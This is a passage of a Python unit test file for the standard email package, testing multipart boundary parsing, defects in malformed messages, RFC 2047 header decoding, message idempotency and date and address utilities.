self._msg = container
self._im = image
self._txt = intro
def test_hierarchy(self):
# convenience
eq = self.assertEqual
raises = self.assertRaises
# tests
m = self._msg
self.assertTrue(m.is_multipart())
eq(m.get_content_type(), 'multipart/mixed')
eq(len(m.get_payload()), 2)
raises(IndexError, m.get_payload, 2)
m0 = m.get_payload(0)
m1 = m.get_payload(1)
self.assertIs(m0, self._txt)
self.assertIs(m1, self._im)
eq(m.get_payload(), [m0, m1])
self.assertFalse(m0.is_multipart())
self.assertFalse(m1.is_multipart())
def test_empty_multipart_idempotent(self):
text = """\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
--BOUNDARY--
"""
msg = Parser().parsestr(text)
self.ndiffAssertEqual(text, msg.as_string())
def test_no_parts_in_a_multipart_with_none_epilogue(self):
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = '[email protected]'
outer['From'] = '[email protected]'
outer.set_boundary('BOUNDARY')
self.ndiffAssertEqual(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
--BOUNDARY--
''')
def test_no_parts_in_a_multipart_with_empty_epilogue(self):
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = '[email protected]'
outer['From'] = '[email protected]'
outer.preamble = ''
outer.epilogue = ''
outer.set_boundary('BOUNDARY')
self.ndiffAssertEqual(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
--BOUNDARY--
''')
def test_one_part_in_a_multipart(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = '[email protected]'
outer['From'] = '[email protected]'
outer.set_boundary('BOUNDARY')
msg = MIMEText('hello world')
outer.attach(msg)
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_seq_parts_in_a_multipart_with_empty_preamble(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = '[email protected]'
outer['From'] = '[email protected]'
outer.preamble = ''
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_seq_parts_in_a_multipart_with_none_preamble(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = '[email protected]'
outer['From'] = '[email protected]'
outer.preamble = None
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_seq_parts_in_a_multipart_with_none_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = '[email protected]'
outer['From'] = '[email protected]'
outer.epilogue = None
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_seq_parts_in_a_multipart_with_empty_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = '[email protected]'
outer['From'] = '[email protected]'
outer.epilogue = ''
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_seq_parts_in_a_multipart_with_nl_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = '[email protected]'
outer['From'] = '[email protected]'
outer.epilogue = '\n'
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: [email protected]
From: [email protected]
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_message_external_body(self):
eq = self.assertEqual
msg = self._msgobj('msg_36.txt')
eq(len(msg.get_payload()), 2)
msg1 = msg.get_payload(1)
eq(msg1.get_content_type(), 'multipart/alternative')
eq(len(msg1.get_payload()), 2)
for subpart in msg1.get_payload():
eq(subpart.get_content_type(), 'message/external-body')
eq(len(subpart.get_payload()), 1)
subsubpart = subpart.get_payload(0)
eq(subsubpart.get_content_type(), 'text/plain')
def test_double_boundary(self):
# msg_37.txt is a multipart that contains two dash-boundary's in a
# row. Our interpretation of RFC 2046 calls for ignoring the second
# and subsequent boundaries.
msg = self._msgobj('msg_37.txt')
self.assertEqual(len(msg.get_payload()), 3)
def test_nested_inner_contains_outer_boundary(self):
eq = self.ndiffAssertEqual
# msg_38.txt has an inner part that contains outer boundaries. My
# interpretation of RFC 2046 (based on sections 5.1 and 5.1.2) say
# these are illegal and should be interpreted as unterminated inner
# parts.
msg = self._msgobj('msg_38.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/mixed
multipart/mixed
multipart/alternative
text/plain
text/plain
text/plain
text/plain
""")
def test_nested_with_same_boundary(self):
eq = self.ndiffAssertEqual
# msg 39.txt is similarly evil in that it's got inner parts that use
# the same boundary as outer parts. Again, I believe the way this is
# parsed is closest to the spirit of RFC 2046
msg = self._msgobj('msg_39.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/mixed
multipart/mixed
multipart/alternative
application/octet-stream
application/octet-stream
text/plain
""")
def test_boundary_in_non_multipart(self):
msg = self._msgobj('msg_40.txt')
self.assertEqual(msg.as_string(), '''\
MIME-Version: 1.0
Content-Type: text/html; boundary="--961284236552522269"
----961284236552522269
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<html></html>
----961284236552522269--
''')
def test_boundary_with_leading_space(self):
eq = self.assertEqual
msg = email.message_from_string('''\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=" XXXX"
-- XXXX
Content-Type: text/plain
-- XXXX
Content-Type: text/plain
-- XXXX--
''')
self.assertTrue(msg.is_multipart())
eq(msg.get_boundary(), ' XXXX')
eq(len(msg.get_payload()), 2)
def test_boundary_without_trailing_newline(self):
m = Parser().parsestr("""\
Content-Type: multipart/mixed; boundary="===============0012394164=="
MIME-Version: 1.0
--===============0012394164==
Content-Type: image/file1.jpg
MIME-Version: 1.0
Content-Transfer-Encoding: base64
YXNkZg==
--===============0012394164==--""")
self.assertEqual(m.get_payload(0).get_payload(), 'YXNkZg==')
# Test some badly formatted messages
class TestNonConformant(TestEmailBase):
def test_parse_missing_minor_type(self):
eq = self.assertEqual
msg = self._msgobj('msg_14.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
def test_same_boundary_inner_outer(self):
msg = self._msgobj('msg_15.txt')
# XXX We can probably eventually do better
inner = msg.get_payload(0)
self.assertTrue(hasattr(inner, 'defects'))
self.assertEqual(len(inner.defects), 1)
self.assertIsInstance(inner.defects[0],
errors.StartBoundaryNotFoundDefect)
def test_multipart_no_boundary(self):
msg = self._msgobj('msg_25.txt')
self.assertIsInstance(msg.get_payload(), str)
self.assertEqual(len(msg.defects), 2)
self.assertIsInstance(msg.defects[0],
errors.NoBoundaryInMultipartDefect)
self.assertIsInstance(msg.defects[1],
errors.MultipartInvariantViolationDefect)
def test_invalid_content_type(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
msg = Message()
# RFC 2045, $5.2 says invalid yields text/plain
msg['Content-Type'] = 'text'
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_content_type(), 'text/plain')
# Clear the old value and try something /really/ invalid
del msg['content-type']
msg['Content-Type'] = 'foo'
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_content_type(), 'text/plain')
# Still, make sure that the message is idempotently generated
s = StringIO()
g = Generator(s)
g.flatten(msg)
neq(s.getvalue(), 'Content-Type: foo\n\n')
def test_no_start_boundary(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_31.txt')
eq(msg.get_payload(), """\
--BOUNDARY
Content-Type: text/plain
message 1
--BOUNDARY
Content-Type: text/plain
message 2
--BOUNDARY--
""")
def test_no_separating_blank_line(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_35.txt')
eq(msg.as_string(), """\
From: [email protected]
To: [email protected]
Subject: here's something interesting
counter to RFC 2822, there's no separating newline here
""")
def test_lying_multipart(self):
msg = self._msgobj('msg_41.txt')
self.assertTrue(hasattr(msg, 'defects'))
self.assertEqual(len(msg.defects), 2)
self.assertIsInstance(msg.defects[0],
errors.NoBoundaryInMultipartDefect)
self.assertIsInstance(msg.defects[1],
errors.MultipartInvariantViolationDefect)
def test_missing_start_boundary(self):
outer = self._msgobj('msg_42.txt')
# The message structure is:
#
# multipart/mixed
# text/plain
# message/rfc822
# multipart/mixed [*]
#
# [*] This message is missing its start boundary
bad = outer.get_payload(1).get_payload(0)
self.assertEqual(len(bad.defects), 1)
self.assertIsInstance(bad.defects[0],
errors.StartBoundaryNotFoundDefect)
def test_first_line_is_continuation_header(self):
eq = self.assertEqual
m = ' Line 1\nLine 2\nLine 3'
msg = email.message_from_string(m)
eq(msg.keys(), [])
eq(msg.get_payload(), 'Line 2\nLine 3')
eq(len(msg.defects), 1)
self.assertIsInstance(msg.defects[0],
errors.FirstHeaderLineIsContinuationDefect)
eq(msg.defects[0].line, ' Line 1\n')
# Test RFC 2047 header encoding and decoding
class TestRFC2047(unittest.TestCase):
def test_rfc2047_multiline(self):
eq = self.assertEqual
s = """Re: =?mac-iceland?q?r=8Aksm=9Arg=8Cs?= baz
foo bar =?mac-iceland?q?r=8Aksm=9Arg=8Cs?="""
dh = decode_header(s)
eq(dh, [
('Re:', None),
('r\x8aksm\x9arg\x8cs', 'mac-iceland'),
('baz foo bar', None),
('r\x8aksm\x9arg\x8cs', 'mac-iceland')])
eq(str(make_header(dh)),
"""Re: =?mac-iceland?q?r=8Aksm=9Arg=8Cs?= baz foo bar
=?mac-iceland?q?r=8Aksm=9Arg=8Cs?=""")
def test_whitespace_eater_unicode(self):
eq = self.assertEqual
s = '=?ISO-8859-1?Q?Andr=E9?= Pirard <[email protected]>'
dh = decode_header(s)
eq(dh, [('Andr\xe9', 'iso-8859-1'), ('Pirard <[email protected]>', None)])
hu = unicode(make_header(dh)).encode('latin-1')
eq(hu, 'Andr\xe9 Pirard <[email protected]>')
def test_whitespace_eater_unicode_2(self):
eq = self.assertEqual
s = 'The =?iso-8859-1?b?cXVpY2sgYnJvd24gZm94?= jumped over the =?iso-8859-1?b?bGF6eSBkb2c=?='
dh = decode_header(s)
eq(dh, [('The', None), ('quick brown fox', 'iso-8859-1'),
('jumped over the', None), ('lazy dog', 'iso-8859-1')])
hu = make_header(dh).__unicode__()
eq(hu, u'The quick brown fox jumped over the lazy dog')
def test_rfc2047_missing_whitespace(self):
s = 'Sm=?ISO-8859-1?B?9g==?=rg=?ISO-8859-1?B?5Q==?=sbord'
dh = decode_header(s)
self.assertEqual(dh, [(s, None)])
def test_rfc2047_with_whitespace(self):
s = 'Sm =?ISO-8859-1?B?9g==?= rg =?ISO-8859-1?B?5Q==?= sbord'
dh = decode_header(s)
self.assertEqual(dh, [('Sm', None), ('\xf6', 'iso-8859-1'),
('rg', None), ('\xe5', 'iso-8859-1'),
('sbord', None)])
# Test the MIMEMessage class
class TestMIMEMessage(TestEmailBase):
def setUp(self):
fp = openfile('msg_11.txt')
try:
self._text = fp.read()
finally:
fp.close()
def test_type_error(self):
self.assertRaises(TypeError, MIMEMessage, 'a plain string')
def test_valid_argument(self):
eq = self.assertEqual
subject = 'A sub-message'
m = Message()
m['Subject'] = subject
r = MIMEMessage(m)
eq(r.get_content_type(), 'message/rfc822')
payload = r.get_payload()
self.assertIsInstance(payload, list)
eq(len(payload), 1)
subpart = payload[0]
self.assertIs(subpart, m)
eq(subpart['subject'], subject)
def test_bad_multipart(self):
eq = self.assertEqual
msg1 = Message()
msg1['Subject'] = 'subpart 1'
msg2 = Message()
msg2['Subject'] = 'subpart 2'
r = MIMEMessage(msg1)
self.assertRaises(errors.MultipartConversionError, r.attach, msg2)
def test_generate(self):
# First craft the message to be encapsulated
m = Message()
m['Subject'] = 'An enclosed message'
m.set_payload('Here is the body of the message.\n')
r = MIMEMessage(m)
r['Subject'] = 'The enclosing message'
s = StringIO()
g = Generator(s)
g.flatten(r)
self.assertEqual(s.getvalue(), """\
Content-Type: message/rfc822
MIME-Version: 1.0
Subject: The enclosing message
Subject: An enclosed message
Here is the body of the message.
""")
def test_parse_message_rfc822(self):
eq = self.assertEqual
msg = self._msgobj('msg_11.txt')
eq(msg.get_content_type(), 'message/rfc822')
payload = msg.get_payload()
self.assertIsInstance(payload, list)
eq(len(payload), 1)
submsg = payload[0]
self.assertIsInstance(submsg, Message)
eq(submsg['subject'], 'An enclosed message')
eq(submsg.get_payload(), 'Here is the body of the message.\n')
def test_dsn(self):
eq = self.assertEqual
# msg 16 is a Delivery Status Notification, see RFC 1894
msg = self._msgobj('msg_16.txt')
eq(msg.get_content_type(), 'multipart/report')
self.assertTrue(msg.is_multipart())
eq(len(msg.get_payload()), 3)
# Subpart 1 is a text/plain, human readable section
subpart = msg.get_payload(0)
eq(subpart.get_content_type(), 'text/plain')
eq(subpart.get_payload(), """\
This report relates to a message you sent with the following header fields:
Message-id: <[email protected]>
Date: Sun, 23 Sep 2001 20:10:55 -0700
From: "Ian T. Henry" <[email protected]>
To: SoCal Raves <[email protected]>
Subject: [scr] yeah for Ians!!
Your message cannot be delivered to the following recipients:
Recipient address: [email protected]
Reason: recipient reached disk quota
""")
# Subpart 2 contains the machine parsable DSN information. It
# consists of two blocks of headers, represented by two nested Message
# objects.
subpart = msg.get_payload(1)
eq(subpart.get_content_type(), 'message/delivery-status')
eq(len(subpart.get_payload()), 2)
# message/delivery-status should treat each block as a bunch of
# headers, i.e. a bunch of Message objects.
dsn1 = subpart.get_payload(0)
self.assertIsInstance(dsn1, Message)
eq(dsn1['original-envelope-id'], '[email protected]')
eq(dsn1.get_param('dns', header='reporting-mta'), '')
# Try a missing one <wink>
eq(dsn1.get_param('nsd', header='reporting-mta'), None)
dsn2 = subpart.get_payload(1)
self.assertIsInstance(dsn2, Message)
eq(dsn2['action'], 'failed')
eq(dsn2.get_params(header='original-recipient'),
[('rfc822', ''), ('[email protected]', '')])
eq(dsn2.get_param('rfc822', header='final-recipient'), '')
# Subpart 3 is the original message
subpart = msg.get_payload(2)
eq(subpart.get_content_type(), 'message/rfc822')
payload = subpart.get_payload()
self.assertIsInstance(payload, list)
eq(len(payload), 1)
subsubpart = payload[0]
self.assertIsInstance(subsubpart, Message)
eq(subsubpart.get_content_type(), 'text/plain')
eq(subsubpart['message-id'],
'<[email protected]>')
def test_epilogue(self):
eq = self.ndiffAssertEqual
fp = openfile('msg_21.txt')
try:
text = fp.read()
finally:
fp.close()
msg = Message()
msg['From'] = '[email protected]'
msg['To'] = '[email protected]'
msg['Subject'] = 'Test'
msg.preamble = 'MIME message'
msg.epilogue = 'End of MIME message\n'
msg1 = MIMEText('One')
msg2 = MIMEText('Two')
msg.add_header('Content-Type', 'multipart/mixed', boundary='BOUNDARY')
msg.attach(msg1)
msg.attach(msg2)
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), text)
def test_no_nl_preamble(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['From'] = '[email protected]'
msg['To'] = '[email protected]'
msg['Subject'] = 'Test'
msg.preamble = 'MIME message'
msg.epilogue = ''
msg1 = MIMEText('One')
msg2 = MIMEText('Two')
msg.add_header('Content-Type', 'multipart/mixed', boundary='BOUNDARY')
msg.attach(msg1)
msg.attach(msg2)
eq(msg.as_string(), """\
From: [email protected]
To: [email protected]
Subject: Test
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME message
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
One
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Two
--BOUNDARY--
""")
def test_default_type(self):
eq = self.assertEqual
fp = openfile('msg_30.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
container1 = msg.get_payload(0)
eq(container1.get_default_type(), 'message/rfc822')
eq(container1.get_content_type(), 'message/rfc822')
container2 = msg.get_payload(1)
eq(container2.get_default_type(), 'message/rfc822')
eq(container2.get_content_type(), 'message/rfc822')
container1a = container1.get_payload(0)
eq(container1a.get_default_type(), 'text/plain')
eq(container1a.get_content_type(), 'text/plain')
container2a = container2.get_payload(0)
eq(container2a.get_default_type(), 'text/plain')
eq(container2a.get_content_type(), 'text/plain')
def test_default_type_with_explicit_container_type(self):
eq = self.assertEqual
fp = openfile('msg_28.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
container1 = msg.get_payload(0)
eq(container1.get_default_type(), 'message/rfc822')
eq(container1.get_content_type(), 'message/rfc822')
container2 = msg.get_payload(1)
eq(container2.get_default_type(), 'message/rfc822')
eq(container2.get_content_type(), 'message/rfc822')
container1a = container1.get_payload(0)
eq(container1a.get_default_type(), 'text/plain')
eq(container1a.get_content_type(), 'text/plain')
container2a = container2.get_payload(0)
eq(container2a.get_default_type(), 'text/plain')
eq(container2a.get_content_type(), 'text/plain')
def test_default_type_non_parsed(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
# Set up container
container = MIMEMultipart('digest', 'BOUNDARY')
container.epilogue = ''
# Set up subparts
subpart1a = MIMEText('message 1\n')
subpart2a = MIMEText('message 2\n')
subpart1 = MIMEMessage(subpart1a)
subpart2 = MIMEMessage(subpart2a)
container.attach(subpart1)
container.attach(subpart2)
eq(subpart1.get_content_type(), 'message/rfc822')
eq(subpart1.get_default_type(), 'message/rfc822')
eq(subpart2.get_content_type(), 'message/rfc822')
eq(subpart2.get_default_type(), 'message/rfc822')
neq(container.as_string(0), '''\
Content-Type: multipart/digest; boundary="BOUNDARY"
MIME-Version: 1.0
--BOUNDARY
Content-Type: message/rfc822
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 1
--BOUNDARY
Content-Type: message/rfc822
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 2
--BOUNDARY--
''')
del subpart1['content-type']
del subpart1['mime-version']
del subpart2['content-type']
del subpart2['mime-version']
eq(subpart1.get_content_type(), 'message/rfc822')
eq(subpart1.get_default_type(), 'message/rfc822')
eq(subpart2.get_content_type(), 'message/rfc822')
eq(subpart2.get_default_type(), 'message/rfc822')
neq(container.as_string(0), '''\
Content-Type: multipart/digest; boundary="BOUNDARY"
MIME-Version: 1.0
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 1
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 2
--BOUNDARY--
''')
def test_mime_attachments_in_constructor(self):
eq = self.assertEqual
text1 = MIMEText('')
text2 = MIMEText('')
msg = MIMEMultipart(_subparts=(text1, text2))
eq(len(msg.get_payload()), 2)
eq(msg.get_payload(0), text1)
eq(msg.get_payload(1), text2)
# A general test of parser->model->generator idempotency. IOW, read a message
# in, parse it into a message object tree, then without touching the tree,
# regenerate the plain text. The original text and the transformed text
# should be identical. Note: that we ignore the Unix-From since that may
# contain a changed date.
class TestIdempotent(TestEmailBase):
def _msgobj(self, filename):
fp = openfile(filename)
try:
data = fp.read()
finally:
fp.close()
msg = email.message_from_string(data)
return msg, data
def _idempotent(self, msg, text):
eq = self.ndiffAssertEqual
s = StringIO()
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
eq(text, s.getvalue())
def test_parse_text_message(self):
eq = self.assertEqual
msg, text = self._msgobj('msg_01.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_params()[1], ('charset', 'us-ascii'))
eq(msg.get_param('charset'), 'us-ascii')
eq(msg.preamble, None)
eq(msg.epilogue, None)
self._idempotent(msg, text)
def test_parse_untyped_message(self):
eq = self.assertEqual
msg, text = self._msgobj('msg_03.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_params(), None)
eq(msg.get_param('charset'), None)
self._idempotent(msg, text)
def test_simple_multipart(self):
msg, text = self._msgobj('msg_04.txt')
self._idempotent(msg, text)
def test_MIME_digest(self):
msg, text = self._msgobj('msg_02.txt')
self._idempotent(msg, text)
def test_long_header(self):
msg, text = self._msgobj('msg_27.txt')
self._idempotent(msg, text)
def test_MIME_digest_with_part_headers(self):
msg, text = self._msgobj('msg_28.txt')
self._idempotent(msg, text)
def test_mixed_with_image(self):
msg, text = self._msgobj('msg_06.txt')
self._idempotent(msg, text)
def test_multipart_report(self):
msg, text = self._msgobj('msg_05.txt')
self._idempotent(msg, text)
def test_dsn(self):
msg, text = self._msgobj('msg_16.txt')
self._idempotent(msg, text)
def test_preamble_epilogue(self):
msg, text = self._msgobj('msg_21.txt')
self._idempotent(msg, text)
def test_multipart_one_part(self):
msg, text = self._msgobj('msg_23.txt')
self._idempotent(msg, text)
def test_multipart_no_parts(self):
msg, text = self._msgobj('msg_24.txt')
self._idempotent(msg, text)
def test_no_start_boundary(self):
msg, text = self._msgobj('msg_31.txt')
self._idempotent(msg, text)
def test_rfc2231_charset(self):
msg, text = self._msgobj('msg_32.txt')
self._idempotent(msg, text)
def test_more_rfc2231_parameters(self):
msg, text = self._msgobj('msg_33.txt')
self._idempotent(msg, text)
def test_text_plain_in_a_multipart_digest(self):
msg, text = self._msgobj('msg_34.txt')
self._idempotent(msg, text)
def test_nested_multipart_mixeds(self):
msg, text = self._msgobj('msg_12a.txt')
self._idempotent(msg, text)
def test_message_external_body_idempotent(self):
msg, text = self._msgobj('msg_36.txt')
self._idempotent(msg, text)
def test_content_type(self):
eq = self.assertEqual
# Get a message object and reset the seek pointer for other tests
msg, text = self._msgobj('msg_05.txt')
eq(msg.get_content_type(), 'multipart/report')
# Test the Content-Type: parameters
params = {}
for pk, pv in msg.get_params():
params[pk] = pv
eq(params['report-type'], 'delivery-status')
eq(params['boundary'], 'D1690A7AC1.996856090/mail.example.com')
eq(msg.preamble, 'This is a MIME-encapsulated message.\n')
eq(msg.epilogue, '\n')
eq(len(msg.get_payload()), 3)
# Make sure the subparts are what we expect
msg1 = msg.get_payload(0)
eq(msg1.get_content_type(), 'text/plain')
eq(msg1.get_payload(), 'Yadda yadda yadda\n')
msg2 = msg.get_payload(1)
eq(msg2.get_content_type(), 'text/plain')
eq(msg2.get_payload(), 'Yadda yadda yadda\n')
msg3 = msg.get_payload(2)
eq(msg3.get_content_type(), 'message/rfc822')
self.assertIsInstance(msg3, Message)
payload = msg3.get_payload()
self.assertIsInstance(payload, list)
eq(len(payload), 1)
msg4 = payload[0]
self.assertIsInstance(msg4, Message)
eq(msg4.get_payload(), 'Yadda yadda yadda\n')
def test_parser(self):
eq = self.assertEqual
msg, text = self._msgobj('msg_06.txt')
# Check some of the outer headers
eq(msg.get_content_type(), 'message/rfc822')
# Make sure the payload is a list of exactly one sub-Message, and that
# that submessage has a type of text/plain
payload = msg.get_payload()
self.assertIsInstance(payload, list)
eq(len(payload), 1)
msg1 = payload[0]
self.assertIsInstance(msg1, Message)
eq(msg1.get_content_type(), 'text/plain')
self.assertIsInstance(msg1.get_payload(), str)
eq(msg1.get_payload(), '\n')
# Test various other bits of the package's functionality
class TestMiscellaneous(TestEmailBase):
def test_message_from_string(self):
fp = openfile('msg_01.txt')
try:
text = fp.read()
finally:
fp.close()
msg = email.message_from_string(text)
s = StringIO()
# Don't wrap/continue long headers since we're trying to test
# idempotency.
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
self.assertEqual(text, s.getvalue())
def test_message_from_file(self):
fp = openfile('msg_01.txt')
try:
text = fp.read()
fp.seek(0)
msg = email.message_from_file(fp)
s = StringIO()
# Don't wrap/continue long headers since we're trying to test
# idempotency.
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
self.assertEqual(text, s.getvalue())
finally:
fp.close()
def test_message_from_string_with_class(self):
fp = openfile('msg_01.txt')
try:
text = fp.read()
finally:
fp.close()
# Create a subclass
class MyMessage(Message):
pass
msg = email.message_from_string(text, MyMessage)
self.assertIsInstance(msg, MyMessage)
# Try something more complicated
fp = openfile('msg_02.txt')
try:
text = fp.read()
finally:
fp.close()
msg = email.message_from_string(text, MyMessage)
for subpart in msg.walk():
self.assertIsInstance(subpart, MyMessage)
def test_message_from_file_with_class(self):
# Create a subclass
class MyMessage(Message):
pass
fp = openfile('msg_01.txt')
try:
msg = email.message_from_file(fp, MyMessage)
finally:
fp.close()
self.assertIsInstance(msg, MyMessage)
# Try something more complicated
fp = openfile('msg_02.txt')
try:
msg = email.message_from_file(fp, MyMessage)
finally:
fp.close()
for subpart in msg.walk():
self.assertIsInstance(subpart, MyMessage)
def test__all__(self):
module = __import__('email')
# Can't use sorted() here due to Python 2.3 compatibility
all = module.__all__[:]
all.sort()
self.assertEqual(all, [
# Old names
'Charset', 'Encoders', 'Errors', 'Generator',
'Header', 'Iterators', 'MIMEAudio', 'MIMEBase',
'MIMEImage', 'MIMEMessage', 'MIMEMultipart',
'MIMENonMultipart', 'MIMEText', 'Message',
'Parser', 'Utils', 'base64MIME',
# new names
'base64mime', 'charset', 'encoders', 'errors', 'generator',
'header', 'iterators', 'message', 'message_from_file',
'message_from_string', 'mime', 'parser',
'quopriMIME', 'quoprimime', 'utils',
])
def test_formatdate(self):
now = time.time()
self.assertEqual(utils.parsedate(utils.formatdate(now))[:6],
time.gmtime(now)[:6])
def test_formatdate_localtime(self):
now = time.time()
self.assertEqual(
utils.parsedate(utils.formatdate(now, localtime=True))[:6],
time.localtime(now)[:6])
def test_formatdate_usegmt(self):
now = time.time()
self.assertEqual(
utils.formatdate(now, localtime=False),
time.strftime('%a, %d %b %Y %H:%M:%S -0000', time.gmtime(now)))
self.assertEqual(
utils.formatdate(now, localtime=False, usegmt=True),
time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime(now)))
def test_parsedate_none(self):
self.assertEqual(utils.parsedate(''), None)
def test_parsedate_compact(self):
# The FWS after the comma is optional
self.assertEqual(utils.parsedate('Wed,3 Apr 2002 14:58:26 +0800'),
utils.parsedate('Wed, 3 Apr 2002 14:58:26 +0800'))
def test_parsedate_no_dayofweek(self):
eq = self.assertEqual
eq(utils.parsedate_tz('25 Feb 2003 13:47:26 -0800'),
(2003, 2, 25, 13, 47, 26, 0, 1, -1, -28800))
def test_parsedate_compact_no_dayofweek(self):
eq = self.assertEqual
eq(utils.parsedate_tz('5 Feb 2003 13:47:26 -0800'),
(2003, 2, 5, 13, 47, 26, 0, 1, -1, -28800))
def test_parsedate_acceptable_to_time_functions(self):
eq = self.assertEqual
timetup = utils.parsedate('5 Feb 2003 13:47:26 -0800')
t = int(time.mktime(timetup))
eq(time.localtime(t)[:6], timetup[:6])
eq(int(time.strftime('%Y', timetup)), 2003)
timetup = utils.parsedate_tz('5 Feb 2003 13:47:26 -0800')
t = int(time.mktime(timetup[:9]))
eq(time.localtime(t)[:6], timetup[:6])
eq(int(time.strftime('%Y', timetup[:9])), 2003)
def test_parseaddr_empty(self):
self.assertEqual(utils.parseaddr('<>'), ('', ''))
self.assertEqual(utils.formataddr(utils.parseaddr('<>')), '')
def test_noquote_dump(self):
self.assertEqual(
utils.formataddr(('A Silly Person', '[email protected]')),
'A Silly Person <[email protected]>')
def test_escape_dump(self):
self.assertEqual(
utils.formataddr(('A (Very) Silly Person', '[email protected]')),
r'"A \(Very\) Silly Person" <[email protected]>')
a = r'A \(Special\) Person'
b = '[email protected]'
self.assertEqual(utils.parseaddr(utils.formataddr((a, b))), (a, b))
def test_escape_backslashes(self):
self.assertEqual(
